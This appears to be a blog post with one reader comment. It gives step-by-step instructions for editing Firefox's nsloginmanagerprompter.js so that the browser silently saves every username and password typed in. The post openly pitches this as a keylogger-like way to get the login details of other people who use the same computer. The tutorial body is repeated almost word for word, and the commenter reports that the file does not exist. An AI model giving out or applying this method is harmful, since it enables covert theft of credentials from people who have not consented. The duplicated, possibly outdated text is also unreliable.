Here is a short tutorial on howhow to get firefox to save usernames & passwords
automatically with any notifications (Sort of like a keylogger) just by editing 1 of the files.
ideal if you want to get someones login details who uses your computer.
Steps :
1) First you need to close firefox.
2) Now locate the nsloginmanagerprompter.js
which is normally found in
C:ProgramFiles
MozillaFirefoxComponents
3) Open
nsloginmanagerprompter.js
with notepad ++
4) Replace the entire line 804
to 869 with the following code
var pwmgr = this._pwmgr;
pwmgr.addLogin(aLogin);
When you are done that
& save as & to your desktop,
then drag back in to the
original folder and replace
the file.
Now your done go into
firefox and try it out..Smile
To see the usernames &
passwords you need to click
on tools at the top of your
browser and go to page info
then security.
They will be saved into the
saved passwords section.
Enjoy
automatically with any notifications (Sort of like a keylogger) just by editing 1 of the files.
ideal if you want to get someones login details who uses your computer.
Steps :
1) First you need to close firefox.
2) Now locate the nsloginmanagerprompter.js
which is normally found in
C:ProgramFiles
MozillaFirefoxComponents
3) Open
nsloginmanagerprompter.js
with notepad ++
4) Replace the entire line 804
to 869 with the following code
var pwmgr = this._pwmgr;
pwmgr.addLogin(aLogin);
When you are done that
& save as & to your desktop,
then drag back in to the
original folder and replace
the file.
Now your done go into
firefox and try it out..Smile
To see the usernames &
passwords you need to click
on tools at the top of your
browser and go to page info
then security.
They will be saved into the
saved passwords section.
Enjoy
but there is no file of this name
ReplyDelete